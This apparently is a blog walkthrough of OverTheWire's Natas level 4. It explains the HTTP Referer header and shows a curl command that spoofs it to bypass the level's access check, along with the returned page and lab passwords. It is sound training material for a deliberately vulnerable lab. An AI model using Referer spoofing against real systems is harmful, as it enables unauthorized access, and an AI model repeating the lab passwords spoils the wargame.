Recommended reading:
From the credentials discovered from the
previous challenge, head up to
http://natas4.natas.labs.overthewire.org and take a look at the page. This time around, you can look at the source all you want, but there's nothing interesting there.
Let's look at the information they give us when we
first open the page:
1
| Access disallowed. You are visiting from "" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/"
|
Now's let's do the only thing we can actually do on this page, press the refresh page link:
1
| Access disallowed. You are visiting from "http://natas4.natas.labs.overthewire.org/" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/"
|
I hope the difference is easy enough to spot. When we enter the page the first time, the server doesn't know from which link we got there, when we use the refresh page link, it knows from where we visited, which is our actual link.
Now in order to understand this, one must have some notions on how HTTP works, specifically HTTP Headers. There's a request header called Referer (should be Referrer, but people can't type!), that has the following definition (quoted from
Wikipedia): "
This is the address of the previous web page from which a link to the currently requested page was followed." Simply put, when we press a link, the destination page will get a Referer header that will have have the URL of the page we came from, easy right?
We know how this works, how can we exploit it? If you remember
level01, we used
curl to fetch the page, in this challenge we're going to do the same thing, but with extra parameters so we can set the header the way we like it, and here's how it looks like:
1
| curl --referer "http://natas5.natas.labs.overthewire.org/" http://natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ@natas4.natas.labs.overthewire.org/
|
We execute the command and get this output:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| <html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas4", "pass": "Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ" };</script></head>
<body>
<h1>natas4</h1>
<div id="content">
Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
<br/>
<div id="viewsource"><a href="index.php">Refresh page</a></div>
</div>
</body>
</html>
|
And just like that, in line 15 we have the password for natas5.
| User |
natas5 |
| Password |
iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq |
One more challenge down, this one required some protocol knowledge in order to exploit, but I'm sure it's still pretty accessible to most. Things are starting to get interesting!
Never Settle,
No comments:
Post a Comment